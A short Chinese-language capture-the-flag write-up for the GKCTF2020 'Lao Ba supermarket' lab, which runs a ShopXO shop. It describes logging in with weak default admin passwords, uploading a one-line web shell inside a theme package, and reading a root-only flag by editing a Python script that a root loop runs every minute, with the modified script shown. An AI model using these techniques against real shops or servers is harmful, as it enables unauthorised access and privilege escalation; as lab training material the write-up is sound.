2020/7/21 - [GKCTF2020]老八小超市 - 弱密码、木马上传、间接非正常提权

这是个简单的实体环境了，这个弱密码起到了很大的作用

1.弱密码

shopxo管理员好像有两个，一个是admin（超级管理员），另一个是shopxo（一般管理员），他们的密码都是shopxo，一句话，弱密码真恶心。

2.下载主题

下载第一个默认主题，不要钱的直接下。

3.上传木马

搞个一句话



安装主题，当主题转为1.8.1就安装成功了，我们的一句话也就上传成功了。

4.连接木马

由此推测我们的一句话上传到的位置为

http://d6f0faff-ce46-4d6f-a68f-47bc8e89f43b.node3.buuoj.cn/public/static/index/default/h4ck.php

测试后发现可以访问，那我们就也能连接啦！

连接成功，发现了flag是假的flag，真的flag在root目录下，但是没权限搞不进去

hint没啥搞头，看auto.sh内容

#!/bin/sh
while true; do (python /var/mail/makeflaghint.py &) && sleep 60; done

每60秒运行一次makeflaghint.py，看py脚本的内容为

import os
import io
import time
os.system("whoami")
gk1=str(time.ctime())
gk="\nGet The RooT,The Date Is Useful!"
f=io.open("/flag.hint", "rb+")
f.write(str(gk1))
f.write(str(gk))
f.close()

改一下就ok啦。 我还没学对文件的操作。这里就先抄一下别人的。

import os
import io
import time
os.system("whoami")
gk1=str(time.ctime())
gk="\nGet The RooT,The Date Is Useful!"
f=io.open("/flag.hint", "rb+")

s = open("/root/flag","r").read()
f.write(s)

f.write(str(gk1))
f.write(str(gk))
f.close()

获得flag。